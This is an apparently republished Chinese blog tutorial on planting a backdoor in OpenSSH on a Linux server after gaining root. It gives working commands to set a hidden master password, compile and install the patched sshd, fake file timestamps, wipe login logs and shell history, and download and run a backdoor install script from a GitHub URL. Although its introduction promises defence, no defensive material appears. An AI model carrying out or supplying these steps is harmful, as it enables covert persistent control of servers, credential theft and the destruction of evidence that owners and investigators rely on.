相對(duì)于Windows操作系統(tǒng)，Linux操作系統(tǒng)的密碼較難獲取。而很多Linux服務(wù)器都配置了Openssh服務(wù)，在獲取root權(quán)限的情況下，可以通過修改或者更新OpenSSH代碼等方法，截取并保存其SSH登錄賬號(hào)密碼，甚至可以留一個(gè)隱形的后門，達(dá)到長(zhǎng)期控制linux服務(wù)器的目的。在很多Linux系統(tǒng)被入侵后都會(huì)在系統(tǒng)中留后門，使用OpenSSH留后門是入侵者的慣用方式之一，OpenSSh后門比較難于檢測(cè)，本文就如何添加OpenSSH后門以及防范后門添加進(jìn)行探討。

1,補(bǔ)丁下載：

2,解壓后文件修改記錄日志及密碼

# cd openssh-5.9p1

# openssl rand 6 -base64 隨機(jī)生成密碼

h7SWmK1V

# vim includes.h

#define ILOG "/tmp/ilog" 修改為空

#define OLOG "/tmp/olog" 修改為空

#define SECRETPW "system" 修改需要登錄的密碼h7SWmK1V

3，安裝相關(guān)依賴

#yum install openssl openssl-devel pam-devel -y

4，備份原有配置文件

#cp -p /etc/ssh/sshd_config{,.bak}

5，編譯安裝

#./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5 && make && make install

6，恢復(fù)之前文件的創(chuàng)建時(shí)間

# cd /etc/ssh/

#touch -r sshd_config.bak ssh_config

7，重載登錄

#service sshd reload

8，刪除記錄

刪除ssh補(bǔ)丁包

# rm -rf openssh-5.9p1*

刪除部分記錄

#echo ""> /var/log/wtmp

#echo ""> /var/log/btmp

#echo ""> ./.bash_history

刪除或者隱藏原本sshd配置文件

#mv sshd_config.bak .sshd_config.bak

腳本安裝：

#wget https://raw.githubusercontent.com/yeohZhou/neiwang/master/sshBackdoorinsatll.sh --no-check

#mv sshBackdoorinsatll.sh/var/tmp/

#cd/var/tmp#chmod+x sshBackdoorinsatll.sh#ssh-V#./sshBackdoorinsatll.shOpenSSH_4.3p2#/etc/init.d/sshd restart

總結(jié)

以上是生活随笔為你收集整理的linux安装openssh 密码错误,Linux安装openssh的后门补丁的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。